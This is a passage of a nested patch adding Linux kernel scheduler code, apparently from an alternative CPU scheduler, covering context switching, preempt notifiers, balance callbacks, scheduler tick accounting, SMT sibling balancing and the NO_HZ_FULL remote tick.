++		static_branch_enable(&sched_schedstats);
++	else
++		static_branch_disable(&sched_schedstats);
++}
++
++void force_schedstat_enabled(void)
++{
++	if (!schedstat_enabled()) {
++		pr_info("kernel profiling enabled schedstats, disable via kernel.sched_schedstats.\n");
++		static_branch_enable(&sched_schedstats);
++	}
++}
++
++static int __init setup_schedstats(char *str)
++{
++	int ret = 0;
++	if (!str)
++		goto out;
++
++	if (!strcmp(str, "enable")) {
++		set_schedstats(true);
++		ret = 1;
++	} else if (!strcmp(str, "disable")) {
++		set_schedstats(false);
++		ret = 1;
++	}
++out:
++	if (!ret)
++		pr_warn("Unable to parse schedstats=\n");
++
++	return ret;
++}
++__setup("schedstats=", setup_schedstats);
++
++#ifdef CONFIG_PROC_SYSCTL
++static int sysctl_schedstats(struct ctl_table *table, int write, void *buffer,
++		size_t *lenp, loff_t *ppos)
++{
++	struct ctl_table t;
++	int err;
++	int state = static_branch_likely(&sched_schedstats);
++
++	if (write && !capable(CAP_SYS_ADMIN))
++		return -EPERM;
++
++	t = *table;
++	t.data = &state;
++	err = proc_dointvec_minmax(&t, write, buffer, lenp, ppos);
++	if (err < 0)
++		return err;
++	if (write)
++		set_schedstats(state);
++	return err;
++}
++
++static struct ctl_table sched_core_sysctls[] = {
++	{
++		.procname       = "sched_schedstats",
++		.data           = NULL,
++		.maxlen         = sizeof(unsigned int),
++		.mode           = 0644,
++		.proc_handler   = sysctl_schedstats,
++		.extra1         = SYSCTL_ZERO,
++		.extra2         = SYSCTL_ONE,
++	},
++	{}
++};
++static int __init sched_core_sysctl_init(void)
++{
++	register_sysctl_init("kernel", sched_core_sysctls);
++	return 0;
++}
++late_initcall(sched_core_sysctl_init);
++#endif /* CONFIG_PROC_SYSCTL */
++#endif /* CONFIG_SCHEDSTATS */
++
++/*
++ * wake_up_new_task - wake up a newly created task for the first time.
++ *
++ * This function will do some initial scheduler statistics housekeeping
++ * that must be done for every newly created context, then puts the task
++ * on the runqueue and wakes it.
++ */
++void wake_up_new_task(struct task_struct *p)
++{
++	unsigned long flags;
++	struct rq *rq;
++
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	WRITE_ONCE(p->__state, TASK_RUNNING);
++	rq = cpu_rq(select_task_rq(p));
++#ifdef CONFIG_SMP
++	rseq_migrate(p);
++	/*
++	 * Fork balancing, do it here and not earlier because:
++	 * - cpus_ptr can change in the fork path
++	 * - any previously selected CPU might disappear through hotplug
++	 *
++	 * Use __set_task_cpu() to avoid calling sched_class::migrate_task_rq,
++	 * as we're not fully set-up yet.
++	 */
++	__set_task_cpu(p, cpu_of(rq));
++#endif
++
++	raw_spin_lock(&rq->lock);
++	update_rq_clock(rq);
++
++	activate_task(p, rq);
++	trace_sched_wakeup_new(p);
++	check_preempt_curr(rq);
++
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++}
++
++#ifdef CONFIG_PREEMPT_NOTIFIERS
++
++static DEFINE_STATIC_KEY_FALSE(preempt_notifier_key);
++
++void preempt_notifier_inc(void)
++{
++	static_branch_inc(&preempt_notifier_key);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_inc);
++
++void preempt_notifier_dec(void)
++{
++	static_branch_dec(&preempt_notifier_key);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_dec);
++
++/**
++ * preempt_notifier_register - tell me when current is being preempted & rescheduled
++ * @notifier: notifier struct to register
++ */
++void preempt_notifier_register(struct preempt_notifier *notifier)
++{
++	if (!static_branch_unlikely(&preempt_notifier_key))
++		WARN(1, "registering preempt_notifier while notifiers disabled\n");
++
++	hlist_add_head(&notifier->link, &current->preempt_notifiers);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_register);
++
++/**
++ * preempt_notifier_unregister - no longer interested in preemption notifications
++ * @notifier: notifier struct to unregister
++ *
++ * This is *not* safe to call from within a preemption notifier.
++ */
++void preempt_notifier_unregister(struct preempt_notifier *notifier)
++{
++	hlist_del(&notifier->link);
++}
++EXPORT_SYMBOL_GPL(preempt_notifier_unregister);
++
++static void __fire_sched_in_preempt_notifiers(struct task_struct *curr)
++{
++	struct preempt_notifier *notifier;
++
++	hlist_for_each_entry(notifier, &curr->preempt_notifiers, link)
++		notifier->ops->sched_in(notifier, raw_smp_processor_id());
++}
++
++static __always_inline void fire_sched_in_preempt_notifiers(struct task_struct *curr)
++{
++	if (static_branch_unlikely(&preempt_notifier_key))
++		__fire_sched_in_preempt_notifiers(curr);
++}
++
++static void
++__fire_sched_out_preempt_notifiers(struct task_struct *curr,
++				   struct task_struct *next)
++{
++	struct preempt_notifier *notifier;
++
++	hlist_for_each_entry(notifier, &curr->preempt_notifiers, link)
++		notifier->ops->sched_out(notifier, next);
++}
++
++static __always_inline void
++fire_sched_out_preempt_notifiers(struct task_struct *curr,
++				 struct task_struct *next)
++{
++	if (static_branch_unlikely(&preempt_notifier_key))
++		__fire_sched_out_preempt_notifiers(curr, next);
++}
++
++#else /* !CONFIG_PREEMPT_NOTIFIERS */
++
++static inline void fire_sched_in_preempt_notifiers(struct task_struct *curr)
++{
++}
++
++static inline void
++fire_sched_out_preempt_notifiers(struct task_struct *curr,
++				 struct task_struct *next)
++{
++}
++
++#endif /* CONFIG_PREEMPT_NOTIFIERS */
++
++static inline void prepare_task(struct task_struct *next)
++{
++	/*
++	 * Claim the task as running, we do this before switching to it
++	 * such that any running task will have this set.
++	 *
++	 * See the smp_load_acquire(&p->on_cpu) case in ttwu() and
++	 * its ordering comment.
++	 */
++	WRITE_ONCE(next->on_cpu, 1);
++}
++
++static inline void finish_task(struct task_struct *prev)
++{
++#ifdef CONFIG_SMP
++	/*
++	 * This must be the very last reference to @prev from this CPU. After
++	 * p->on_cpu is cleared, the task can be moved to a different CPU. We
++	 * must ensure this doesn't happen until the switch is completely
++	 * finished.
++	 *
++	 * In particular, the load of prev->state in finish_task_switch() must
++	 * happen before this.
++	 *
++	 * Pairs with the smp_cond_load_acquire() in try_to_wake_up().
++	 */
++	smp_store_release(&prev->on_cpu, 0);
++#else
++	prev->on_cpu = 0;
++#endif
++}
++
++#ifdef CONFIG_SMP
++
++static void do_balance_callbacks(struct rq *rq, struct balance_callback *head)
++{
++	void (*func)(struct rq *rq);
++	struct balance_callback *next;
++
++	lockdep_assert_held(&rq->lock);
++
++	while (head) {
++		func = (void (*)(struct rq *))head->func;
++		next = head->next;
++		head->next = NULL;
++		head = next;
++
++		func(rq);
++	}
++}
++
++static void balance_push(struct rq *rq);
++
++/*
++ * balance_push_callback is a right abuse of the callback interface and plays
++ * by significantly different rules.
++ *
++ * Where the normal balance_callback's purpose is to be ran in the same context
++ * that queued it (only later, when it's safe to drop rq->lock again),
++ * balance_push_callback is specifically targeted at __schedule().
++ *
++ * This abuse is tolerated because it places all the unlikely/odd cases behind
++ * a single test, namely: rq->balance_callback == NULL.
++ */
++struct balance_callback balance_push_callback = {
++	.next = NULL,
++	.func = balance_push,
++};
++
++static inline struct balance_callback *
++__splice_balance_callbacks(struct rq *rq, bool split)
++{
++	struct balance_callback *head = rq->balance_callback;
++
++	if (likely(!head))
++		return NULL;
++
++	lockdep_assert_rq_held(rq);
++	/*
++	 * Must not take balance_push_callback off the list when
++	 * splice_balance_callbacks() and balance_callbacks() are not
++	 * in the same rq->lock section.
++	 *
++	 * In that case it would be possible for __schedule() to interleave
++	 * and observe the list empty.
++	 */
++	if (split && head == &balance_push_callback)
++		head = NULL;
++	else
++		rq->balance_callback = NULL;
++
++	return head;
++}
++
++static inline struct balance_callback *splice_balance_callbacks(struct rq *rq)
++{
++	return __splice_balance_callbacks(rq, true);
++}
++
++static void __balance_callbacks(struct rq *rq)
++{
++	do_balance_callbacks(rq, __splice_balance_callbacks(rq, false));
++}
++
++static inline void balance_callbacks(struct rq *rq, struct balance_callback *head)
++{
++	unsigned long flags;
++
++	if (unlikely(head)) {
++		raw_spin_lock_irqsave(&rq->lock, flags);
++		do_balance_callbacks(rq, head);
++		raw_spin_unlock_irqrestore(&rq->lock, flags);
++	}
++}
++
++#else
++
++static inline void __balance_callbacks(struct rq *rq)
++{
++}
++
++static inline struct balance_callback *splice_balance_callbacks(struct rq *rq)
++{
++	return NULL;
++}
++
++static inline void balance_callbacks(struct rq *rq, struct balance_callback *head)
++{
++}
++
++#endif
++
++static inline void
++prepare_lock_switch(struct rq *rq, struct task_struct *next)
++{
++	/*
++	 * Since the runqueue lock will be released by the next
++	 * task (which is an invalid locking op but in the case
++	 * of the scheduler it's an obvious special-case), so we
++	 * do an early lockdep release here:
++	 */
++	spin_release(&rq->lock.dep_map, _THIS_IP_);
++#ifdef CONFIG_DEBUG_SPINLOCK
++	/* this is a valid case when another task releases the spinlock */
++	rq->lock.owner = next;
++#endif
++}
++
++static inline void finish_lock_switch(struct rq *rq)
++{
++	/*
++	 * If we are tracking spinlock dependencies then we have to
++	 * fix up the runqueue lock - which gets 'carried over' from
++	 * prev into current:
++	 */
++	spin_acquire(&rq->lock.dep_map, 0, 0, _THIS_IP_);
++	__balance_callbacks(rq);
++	raw_spin_unlock_irq(&rq->lock);
++}
++
++/*
++ * NOP if the arch has not defined these:
++ */
++
++#ifndef prepare_arch_switch
++# define prepare_arch_switch(next)	do { } while (0)
++#endif
++
++#ifndef finish_arch_post_lock_switch
++# define finish_arch_post_lock_switch()	do { } while (0)
++#endif
++
++static inline void kmap_local_sched_out(void)
++{
++#ifdef CONFIG_KMAP_LOCAL
++	if (unlikely(current->kmap_ctrl.idx))
++		__kmap_local_sched_out();
++#endif
++}
++
++static inline void kmap_local_sched_in(void)
++{
++#ifdef CONFIG_KMAP_LOCAL
++	if (unlikely(current->kmap_ctrl.idx))
++		__kmap_local_sched_in();
++#endif
++}
++
++/**
++ * prepare_task_switch - prepare to switch tasks
++ * @rq: the runqueue preparing to switch
++ * @next: the task we are going to switch to.
++ *
++ * This is called with the rq lock held and interrupts off. It must
++ * be paired with a subsequent finish_task_switch after the context
++ * switch.
++ *
++ * prepare_task_switch sets up locking and calls architecture specific
++ * hooks.
++ */
++static inline void
++prepare_task_switch(struct rq *rq, struct task_struct *prev,
++		    struct task_struct *next)
++{
++	kcov_prepare_switch(prev);
++	sched_info_switch(rq, prev, next);
++	perf_event_task_sched_out(prev, next);
++	rseq_preempt(prev);
++	fire_sched_out_preempt_notifiers(prev, next);
++	kmap_local_sched_out();
++	prepare_task(next);
++	prepare_arch_switch(next);
++}
++
++/**
++ * finish_task_switch - clean up after a task-switch
++ * @rq: runqueue associated with task-switch
++ * @prev: the thread we just switched away from.
++ *
++ * finish_task_switch must be called after the context switch, paired
++ * with a prepare_task_switch call before the context switch.
++ * finish_task_switch will reconcile locking set up by prepare_task_switch,
++ * and do any other architecture-specific cleanup actions.
++ *
++ * Note that we may have delayed dropping an mm in context_switch(). If
++ * so, we finish that here outside of the runqueue lock.  (Doing it
++ * with the lock held can cause deadlocks; see schedule() for
++ * details.)
++ *
++ * The context switch have flipped the stack from under us and restored the
++ * local variables which were saved when this task called schedule() in the
++ * past. prev == current is still correct but we need to recalculate this_rq
++ * because prev may have moved to another CPU.
++ */
++static struct rq *finish_task_switch(struct task_struct *prev)
++	__releases(rq->lock)
++{
++	struct rq *rq = this_rq();
++	struct mm_struct *mm = rq->prev_mm;
++	unsigned int prev_state;
++
++	/*
++	 * The previous task will have left us with a preempt_count of 2
++	 * because it left us after:
++	 *
++	 *	schedule()
++	 *	  preempt_disable();			// 1
++	 *	  __schedule()
++	 *	    raw_spin_lock_irq(&rq->lock)	// 2
++	 *
++	 * Also, see FORK_PREEMPT_COUNT.
++	 */
++	if (WARN_ONCE(preempt_count() != 2*PREEMPT_DISABLE_OFFSET,
++		      "corrupted preempt_count: %s/%d/0x%x\n",
++		      current->comm, current->pid, preempt_count()))
++		preempt_count_set(FORK_PREEMPT_COUNT);
++
++	rq->prev_mm = NULL;
++
++	/*
++	 * A task struct has one reference for the use as "current".
++	 * If a task dies, then it sets TASK_DEAD in tsk->state and calls
++	 * schedule one last time. The schedule call will never return, and
++	 * the scheduled task must drop that reference.
++	 *
++	 * We must observe prev->state before clearing prev->on_cpu (in
++	 * finish_task), otherwise a concurrent wakeup can get prev
++	 * running on another CPU and we could rave with its RUNNING -> DEAD
++	 * transition, resulting in a double drop.
++	 */
++	prev_state = READ_ONCE(prev->__state);
++	vtime_task_switch(prev);
++	perf_event_task_sched_in(prev, current);
++	finish_task(prev);
++	tick_nohz_task_switch();
++	finish_lock_switch(rq);
++	finish_arch_post_lock_switch();
++	kcov_finish_switch(current);
++	/*
++	 * kmap_local_sched_out() is invoked with rq::lock held and
++	 * interrupts disabled. There is no requirement for that, but the
++	 * sched out code does not have an interrupt enabled section.
++	 * Restoring the maps on sched in does not require interrupts being
++	 * disabled either.
++	 */
++	kmap_local_sched_in();
++
++	fire_sched_in_preempt_notifiers(current);
++	/*
++	 * When switching through a kernel thread, the loop in
++	 * membarrier_{private,global}_expedited() may have observed that
++	 * kernel thread and not issued an IPI. It is therefore possible to
++	 * schedule between user->kernel->user threads without passing though
++	 * switch_mm(). Membarrier requires a barrier after storing to
++	 * rq->curr, before returning to userspace, so provide them here:
++	 *
++	 * - a full memory barrier for {PRIVATE,GLOBAL}_EXPEDITED, implicitly
++	 *   provided by mmdrop(),
++	 * - a sync_core for SYNC_CORE.
++	 */
++	if (mm) {
++		membarrier_mm_sync_core_before_usermode(mm);
++		mmdrop_sched(mm);
++	}
++	if (unlikely(prev_state == TASK_DEAD)) {
++		/* Task is done with its stack. */
++		put_task_stack(prev);
++
++		put_task_struct_rcu_user(prev);
++	}
++
++	return rq;
++}
++
++/**
++ * schedule_tail - first thing a freshly forked thread must call.
++ * @prev: the thread we just switched away from.
++ */
++asmlinkage __visible void schedule_tail(struct task_struct *prev)
++	__releases(rq->lock)
++{
++	/*
++	 * New tasks start with FORK_PREEMPT_COUNT, see there and
++	 * finish_task_switch() for details.
++	 *
++	 * finish_task_switch() will drop rq->lock() and lower preempt_count
++	 * and the preempt_enable() will end up enabling preemption (on
++	 * PREEMPT_COUNT kernels).
++	 */
++
++	finish_task_switch(prev);
++	preempt_enable();
++
++	if (current->set_child_tid)
++		put_user(task_pid_vnr(current), current->set_child_tid);
++
++	calculate_sigpending();
++}
++
++/*
++ * context_switch - switch to the new MM and the new thread's register state.
++ */
++static __always_inline struct rq *
++context_switch(struct rq *rq, struct task_struct *prev,
++	       struct task_struct *next)
++{
++	prepare_task_switch(rq, prev, next);
++
++	/*
++	 * For paravirt, this is coupled with an exit in switch_to to
++	 * combine the page table reload and the switch backend into
++	 * one hypercall.
++	 */
++	arch_start_context_switch(prev);
++
++	/*
++	 * kernel -> kernel   lazy + transfer active
++	 *   user -> kernel   lazy + mmgrab() active
++	 *
++	 * kernel ->   user   switch + mmdrop() active
++	 *   user ->   user   switch
++	 */
++	if (!next->mm) {                                // to kernel
++		enter_lazy_tlb(prev->active_mm, next);
++
++		next->active_mm = prev->active_mm;
++		if (prev->mm)                           // from user
++			mmgrab(prev->active_mm);
++		else
++			prev->active_mm = NULL;
++	} else {                                        // to user
++		membarrier_switch_mm(rq, prev->active_mm, next->mm);
++		/*
++		 * sys_membarrier() requires an smp_mb() between setting
++		 * rq->curr / membarrier_switch_mm() and returning to userspace.
++		 *
++		 * The below provides this either through switch_mm(), or in
++		 * case 'prev->active_mm == next->mm' through
++		 * finish_task_switch()'s mmdrop().
++		 */
++		switch_mm_irqs_off(prev->active_mm, next->mm, next);
++		lru_gen_use_mm(next->mm);
++
++		if (!prev->mm) {                        // from kernel
++			/* will mmdrop() in finish_task_switch(). */
++			rq->prev_mm = prev->active_mm;
++			prev->active_mm = NULL;
++		}
++	}
++
++	prepare_lock_switch(rq, next);
++
++	/* Here we just switch the register state and the stack. */
++	switch_to(prev, next, prev);
++	barrier();
++
++	return finish_task_switch(prev);
++}
++
++/*
++ * nr_running, nr_uninterruptible and nr_context_switches:
++ *
++ * externally visible scheduler statistics: current number of runnable
++ * threads, total number of context switches performed since bootup.
++ */
++unsigned int nr_running(void)
++{
++	unsigned int i, sum = 0;
++
++	for_each_online_cpu(i)
++		sum += cpu_rq(i)->nr_running;
++
++	return sum;
++}
++
++/*
++ * Check if only the current task is running on the CPU.
++ *
++ * Caution: this function does not check that the caller has disabled
++ * preemption, thus the result might have a time-of-check-to-time-of-use
++ * race.  The caller is responsible to use it correctly, for example:
++ *
++ * - from a non-preemptible section (of course)
++ *
++ * - from a thread that is bound to a single CPU
++ *
++ * - in a loop with very short iterations (e.g. a polling loop)
++ */
++bool single_task_running(void)
++{
++	return raw_rq()->nr_running == 1;
++}
++EXPORT_SYMBOL(single_task_running);
++
++unsigned long long nr_context_switches(void)
++{
++	int i;
++	unsigned long long sum = 0;
++
++	for_each_possible_cpu(i)
++		sum += cpu_rq(i)->nr_switches;
++
++	return sum;
++}
++
++/*
++ * Consumers of these two interfaces, like for example the cpuidle menu
++ * governor, are using nonsensical data. Preferring shallow idle state selection
++ * for a CPU that has IO-wait which might not even end up running the task when
++ * it does become runnable.
++ */
++
++unsigned int nr_iowait_cpu(int cpu)
++{
++	return atomic_read(&cpu_rq(cpu)->nr_iowait);
++}
++
++/*
++ * IO-wait accounting, and how it's mostly bollocks (on SMP).
++ *
++ * The idea behind IO-wait account is to account the idle time that we could
++ * have spend running if it were not for IO. That is, if we were to improve the
++ * storage performance, we'd have a proportional reduction in IO-wait time.
++ *
++ * This all works nicely on UP, where, when a task blocks on IO, we account
++ * idle time as IO-wait, because if the storage were faster, it could've been
++ * running and we'd not be idle.
++ *
++ * This has been extended to SMP, by doing the same for each CPU. This however
++ * is broken.
++ *
++ * Imagine for instance the case where two tasks block on one CPU, only the one
++ * CPU will have IO-wait accounted, while the other has regular idle. Even
++ * though, if the storage were faster, both could've ran at the same time,
++ * utilising both CPUs.
++ *
++ * This means, that when looking globally, the current IO-wait accounting on
++ * SMP is a lower bound, by reason of under accounting.
++ *
++ * Worse, since the numbers are provided per CPU, they are sometimes
++ * interpreted per CPU, and that is nonsensical. A blocked task isn't strictly
++ * associated with any one particular CPU, it can wake to another CPU than it
++ * blocked on. This means the per CPU IO-wait number is meaningless.
++ *
++ * Task CPU affinities can make all that even more 'interesting'.
++ */
++
++unsigned int nr_iowait(void)
++{
++	unsigned int i, sum = 0;
++
++	for_each_possible_cpu(i)
++		sum += nr_iowait_cpu(i);
++
++	return sum;
++}
++
++#ifdef CONFIG_SMP
++
++/*
++ * sched_exec - execve() is a valuable balancing opportunity, because at
++ * this point the task has the smallest effective memory and cache
++ * footprint.
++ */
++void sched_exec(void)
++{
++}
++
++#endif
++
++DEFINE_PER_CPU(struct kernel_stat, kstat);
++DEFINE_PER_CPU(struct kernel_cpustat, kernel_cpustat);
++
++EXPORT_PER_CPU_SYMBOL(kstat);
++EXPORT_PER_CPU_SYMBOL(kernel_cpustat);
++
++static inline void update_curr(struct rq *rq, struct task_struct *p)
++{
++	s64 ns = rq->clock_task - p->last_ran;
++
++	p->sched_time += ns;
++	cgroup_account_cputime(p, ns);
++	account_group_exec_runtime(p, ns);
++
++	p->time_slice -= ns;
++	p->last_ran = rq->clock_task;
++}
++
++/*
++ * Return accounted runtime for the task.
++ * Return separately the current's pending runtime that have not been
++ * accounted yet.
++ */
++unsigned long long task_sched_runtime(struct task_struct *p)
++{
++	unsigned long flags;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++	u64 ns;
++
++#if defined(CONFIG_64BIT) && defined(CONFIG_SMP)
++	/*
++	 * 64-bit doesn't need locks to atomically read a 64-bit value.
++	 * So we have a optimization chance when the task's delta_exec is 0.
++	 * Reading ->on_cpu is racy, but this is ok.
++	 *
++	 * If we race with it leaving CPU, we'll take a lock. So we're correct.
++	 * If we race with it entering CPU, unaccounted time is 0. This is
++	 * indistinguishable from the read occurring a few cycles earlier.
++	 * If we see ->on_cpu without ->on_rq, the task is leaving, and has
++	 * been accounted, so we're correct here as well.
++	 */
++	if (!p->on_cpu || !task_on_rq_queued(p))
++		return tsk_seruntime(p);
++#endif
++
++	rq = task_access_lock_irqsave(p, &lock, &flags);
++	/*
++	 * Must be ->curr _and_ ->on_rq.  If dequeued, we would
++	 * project cycles that may never be accounted to this
++	 * thread, breaking clock_gettime().
++	 */
++	if (p == rq->curr && task_on_rq_queued(p)) {
++		update_rq_clock(rq);
++		update_curr(rq, p);
++	}
++	ns = tsk_seruntime(p);
++	task_access_unlock_irqrestore(p, lock, &flags);
++
++	return ns;
++}
++
++/* This manages tasks that have run out of timeslice during a scheduler_tick */
++static inline void scheduler_task_tick(struct rq *rq)
++{
++	struct task_struct *p = rq->curr;
++
++	if (is_idle_task(p))
++		return;
++
++	update_curr(rq, p);
++	cpufreq_update_util(rq, 0);
++
++	/*
++	 * Tasks have less than RESCHED_NS of time slice left they will be
++	 * rescheduled.
++	 */
++	if (p->time_slice >= RESCHED_NS)
++		return;
++	set_tsk_need_resched(p);
++	set_preempt_need_resched();
++}
++
++#ifdef CONFIG_SCHED_DEBUG
++static u64 cpu_resched_latency(struct rq *rq)
++{
++	int latency_warn_ms = READ_ONCE(sysctl_resched_latency_warn_ms);
++	u64 resched_latency, now = rq_clock(rq);
++	static bool warned_once;
++
++	if (sysctl_resched_latency_warn_once && warned_once)
++		return 0;
++
++	if (!need_resched() || !latency_warn_ms)
++		return 0;
++
++	if (system_state == SYSTEM_BOOTING)
++		return 0;
++
++	if (!rq->last_seen_need_resched_ns) {
++		rq->last_seen_need_resched_ns = now;
++		rq->ticks_without_resched = 0;
++		return 0;
++	}
++
++	rq->ticks_without_resched++;
++	resched_latency = now - rq->last_seen_need_resched_ns;
++	if (resched_latency <= latency_warn_ms * NSEC_PER_MSEC)
++		return 0;
++
++	warned_once = true;
++
++	return resched_latency;
++}
++
++static int __init setup_resched_latency_warn_ms(char *str)
++{
++	long val;
++
++	if ((kstrtol(str, 0, &val))) {
++		pr_warn("Unable to set resched_latency_warn_ms\n");
++		return 1;
++	}
++
++	sysctl_resched_latency_warn_ms = val;
++	return 1;
++}
++__setup("resched_latency_warn_ms=", setup_resched_latency_warn_ms);
++#else
++static inline u64 cpu_resched_latency(struct rq *rq) { return 0; }
++#endif /* CONFIG_SCHED_DEBUG */
++
++/*
++ * This function gets called by the timer code, with HZ frequency.
++ * We call it with interrupts disabled.
++ */
++void scheduler_tick(void)
++{
++	int cpu __maybe_unused = smp_processor_id();
++	struct rq *rq = cpu_rq(cpu);
++	u64 resched_latency;
++
++	arch_scale_freq_tick();
++	sched_clock_tick();
++
++	raw_spin_lock(&rq->lock);
++	update_rq_clock(rq);
++
++	scheduler_task_tick(rq);
++	if (sched_feat(LATENCY_WARN))
++		resched_latency = cpu_resched_latency(rq);
++	calc_global_load_tick(rq);
++
++	rq->last_tick = rq->clock;
++	raw_spin_unlock(&rq->lock);
++
++	if (sched_feat(LATENCY_WARN) && resched_latency)
++		resched_latency_warn(cpu, resched_latency);
++
++	perf_event_task_tick();
++}
++
++#ifdef CONFIG_SCHED_SMT
++static inline int sg_balance_cpu_stop(void *data)
++{
++	struct rq *rq = this_rq();
++	struct task_struct *p = data;
++	cpumask_t tmp;
++	unsigned long flags;
++
++	local_irq_save(flags);
++
++	raw_spin_lock(&p->pi_lock);
++	raw_spin_lock(&rq->lock);
++
++	rq->active_balance = 0;
++	/* _something_ may have changed the task, double check again */
++	if (task_on_rq_queued(p) && task_rq(p) == rq &&
++	    cpumask_and(&tmp, p->cpus_ptr, &sched_sg_idle_mask) &&
++	    !is_migration_disabled(p)) {
++		int cpu = cpu_of(rq);
++		int dcpu = __best_mask_cpu(&tmp, per_cpu(sched_cpu_llc_mask, cpu));
++		rq = move_queued_task(rq, p, dcpu);
++	}
++
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock(&p->pi_lock);
++
++	local_irq_restore(flags);
++
++	return 0;
++}
++
++/* sg_balance_trigger - trigger slibing group balance for @cpu */
++static inline int sg_balance_trigger(const int cpu)
++{
++	struct rq *rq= cpu_rq(cpu);
++	unsigned long flags;
++	struct task_struct *curr;
++	int res;
++
++	if (!raw_spin_trylock_irqsave(&rq->lock, flags))
++		return 0;
++	curr = rq->curr;
++	res = (!is_idle_task(curr)) && (1 == rq->nr_running) &&\
++	      cpumask_intersects(curr->cpus_ptr, &sched_sg_idle_mask) &&\
++	      !is_migration_disabled(curr) && (!rq->active_balance);
++
++	if (res)
++		rq->active_balance = 1;
++
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++	if (res)
++		stop_one_cpu_nowait(cpu, sg_balance_cpu_stop, curr,
++				    &rq->active_balance_work);
++	return res;
++}
++
++/*
++ * sg_balance - slibing group balance check for run queue @rq
++ */
++static inline void sg_balance(struct rq *rq)
++{
++	cpumask_t chk;
++	int cpu = cpu_of(rq);
++
++	/* exit when cpu is offline */
++	if (unlikely(!rq->online))
++		return;
++
++	/*
++	 * Only cpu in slibing idle group will do the checking and then
++	 * find potential cpus which can migrate the current running task
++	 */
++	if (cpumask_test_cpu(cpu, &sched_sg_idle_mask) &&
++	    cpumask_andnot(&chk, cpu_online_mask, sched_idle_mask) &&
++	    cpumask_andnot(&chk, &chk, &sched_rq_pending_mask)) {
++		int i;
++
++		for_each_cpu_wrap(i, &chk, cpu) {
++			if (cpumask_subset(cpu_smt_mask(i), &chk) &&
++			    sg_balance_trigger(i))
++				return;
++		}
++	}
++}
++#endif /* CONFIG_SCHED_SMT */
++
++#ifdef CONFIG_NO_HZ_FULL
++
++struct tick_work {
++	int			cpu;
++	atomic_t		state;
++	struct delayed_work	work;
++};
++/* Values for ->state, see diagram below. */
++#define TICK_SCHED_REMOTE_OFFLINE	0
++#define TICK_SCHED_REMOTE_OFFLINING	1
++#define TICK_SCHED_REMOTE_RUNNING	2
++
++/*
++ * State diagram for ->state:
++ *
++ *
++ *          TICK_SCHED_REMOTE_OFFLINE
++ *                    |   ^
++ *                    |   |
++ *                    |   | sched_tick_remote()
++ *                    |   |
++ *                    |   |
++ *                    +--TICK_SCHED_REMOTE_OFFLINING
++ *                    |   ^
++ *                    |   |
++ * sched_tick_start() |   | sched_tick_stop()
++ *                    |   |
++ *                    V   |
++ *          TICK_SCHED_REMOTE_RUNNING
++ *
++ *
++ * Other transitions get WARN_ON_ONCE(), except that sched_tick_remote()
++ * and sched_tick_start() are happy to leave the state in RUNNING.
++ */
++
++static struct tick_work __percpu *tick_work_cpu;
++
++static void sched_tick_remote(struct work_struct *work)
++{
++	struct delayed_work *dwork = to_delayed_work(work);
++	struct tick_work *twork = container_of(dwork, struct tick_work, work);
++	int cpu = twork->cpu;
++	struct rq *rq = cpu_rq(cpu);
++	struct task_struct *curr;
++	unsigned long flags;
++	u64 delta;
++	int os;
++
++	/*
++	 * Handle the tick only if it appears the remote CPU is running in full
++	 * dynticks mode. The check is racy by nature, but missing a tick or
++	 * having one too much is no big deal because the scheduler tick updates
++	 * statistics and checks timeslices in a time-independent way, regardless
++	 * of when exactly it is running.
++	 */
++	if (!tick_nohz_tick_stopped_cpu(cpu))
++		goto out_requeue;
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	curr = rq->curr;
++	if (cpu_is_offline(cpu))
++		goto out_unlock;
++
++	update_rq_clock(rq);
++	if (!is_idle_task(curr)) {
++		/*
++		 * Make sure the next tick runs within a reasonable
++		 * amount of time.
++		 */
++		delta = rq_clock_task(rq) - curr->last_ran;
++		WARN_ON_ONCE(delta > (u64)NSEC_PER_SEC * 3);
++	}
++	scheduler_task_tick(rq);
++
++	calc_load_nohz_remote(rq);
++out_unlock:
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++out_requeue:
++	/*
++	 * Run the remote tick once per second (1Hz). This arbitrary
++	 * frequency is large enough to avoid overload but short enough
++	 * to keep scheduler internal stats reasonably up to date.  But
++	 * first update state to reflect hotplug activity if required.
++	 */
++	os = atomic_fetch_add_unless(&twork->state, -1, TICK_SCHED_REMOTE_RUNNING);
++	WARN_ON_ONCE(os == TICK_SCHED_REMOTE_OFFLINE);
++	if (os == TICK_SCHED_REMOTE_RUNNING)
++		queue_delayed_work(system_unbound_wq, dwork, HZ);
++}
++
++static void sched_tick_start(int cpu)
++{
++	int os;
++	struct tick_work *twork;
++
++	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
++		return;
++
++	WARN_ON_ONCE(!tick_work_cpu);
++
++	twork = per_cpu_ptr(tick_work_cpu, cpu);
++	os = atomic_xchg(&twork->state, TICK_SCHED_REMOTE_RUNNING);
++	WARN_ON_ONCE(os == TICK_SCHED_REMOTE_RUNNING);
++	if (os == TICK_SCHED_REMOTE_OFFLINE) {
++		twork->cpu = cpu;
++		INIT_DELAYED_WORK(&twork->work, sched_tick_remote);
++		queue_delayed_work(system_unbound_wq, &twork->work, HZ);
++	}
++}
++
++#ifdef CONFIG_HOTPLUG_CPU
++static void sched_tick_stop(int cpu)
++{
++	struct tick_work *twork;
++
++	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
++		return;
++
++	WARN_ON_ONCE(!tick_work_cpu);
++
++	twork = per_cpu_ptr(tick_work_cpu, cpu);
++	cancel_delayed_work_sync(&twork->work);
++}
++#endif /* CONFIG_HOTPLUG_CPU */
++
++int __init sched_tick_offload_init(void)
++{
++	tick_work_cpu = alloc_percpu(struct tick_work);
++	BUG_ON(!tick_work_cpu);
++	return 0;
++}
++
++#else /* !CONFIG_NO_HZ_FULL */
++static inline void sched_tick_start(int cpu) { }
++static inline void sched_tick_stop(int cpu) { }
++#endif
++
++#if defined(CONFIG_PREEMPTION) && (defined(CONFIG_DEBUG_PREEMPT) || \
++				defined(CONFIG_PREEMPT_TRACER))
++/*
++ * If the value passed in is equal to the current preempt count
++ * then we just disabled preemption. Start timing the latency.
++ */
